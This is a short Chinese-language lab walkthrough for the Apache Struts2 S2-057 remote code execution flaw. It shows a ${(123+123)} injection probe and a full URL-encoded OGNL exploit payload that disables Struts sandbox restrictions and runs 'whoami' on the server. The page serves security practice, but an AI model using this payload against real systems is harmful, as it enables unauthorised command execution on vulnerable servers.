当前位置: 首页 > news >正文

struts2漏洞攻略

news 来源:原创 2025/4/30 18:24:20

S2-057远程执行代码漏洞

靶场: /struts2/s2-057

1,搭建好环境后访问

http://47.108.150.249:8081/struts2-showcase/

2,在url处进行输⼊

在url输入http://47.108.150.249:8081/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加

3,将上面验证payload的值修改为我们的利用exp

将第二步中的${(123+123)}替换为以下内容

 $%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23
 request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.o
 pensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getIns
 tance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcl
 udedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.cle
 ar%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Run
 time@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.I
 OUtils@toString%28%23a.getInputStream%28%29%29%29%7D

相关文章:

  • python多线程和多进程的区别有哪些
  • 蓝桥杯,利用 Vue.js 构建简易任务管理器
  • 3.17-3.23 Web3 游戏周报:Pixudi 双榜领跑,The Forgotten Runiverse 登陆三大主机平台
  • 【MYSQL】聚合查询、分组查询、联合查询
  • 《软件安装与使用教程》— NVIDIA CUDA在Windows的安装教程
  • IDEA工具使用之启动项目失败且无日志打印
  • 如何创建一个socket服务器?
  • 【C#语言】深入理解C#多线程编程:从基础到高性能实践
  • AI 时代,我们需要什么样的数据库?
  • Linux split 命令实现日志文件的拆分
  • 自由学习记录(48)
  • MATLAB 批量移动 TIF 文件至分类文件夹
  • C++对C的拓展-3.22笔记
  • 深入解析C++面向对象三大特性:封装、继承与多态v
  • SpringBoot+策略模式+枚举类,优雅消除if-else
  • HandyJSON原理
  • softmax回归的实现
  • gma 2.1.3 (2025.03.19) 更新日志
  • 计算机考研复试机试-考前速记
  • flink广播算子Broadcast
  • 湖北鄂州通报4所小学学生呕吐腹泻:供餐企业负责人被采取强制措施
  • 黄宾虹诞辰160周年|一次宾翁精品的大集结
  • 总书记考察的上海“模速空间”,是一个怎样的空间?
  • 一周人物|卡鲁等入围英国特纳奖,李学明新展中国美术馆
  • 解放日报头版:人民城市共建共享展新卷
  • 早睡1小时,变化有多惊人?第一个就没想到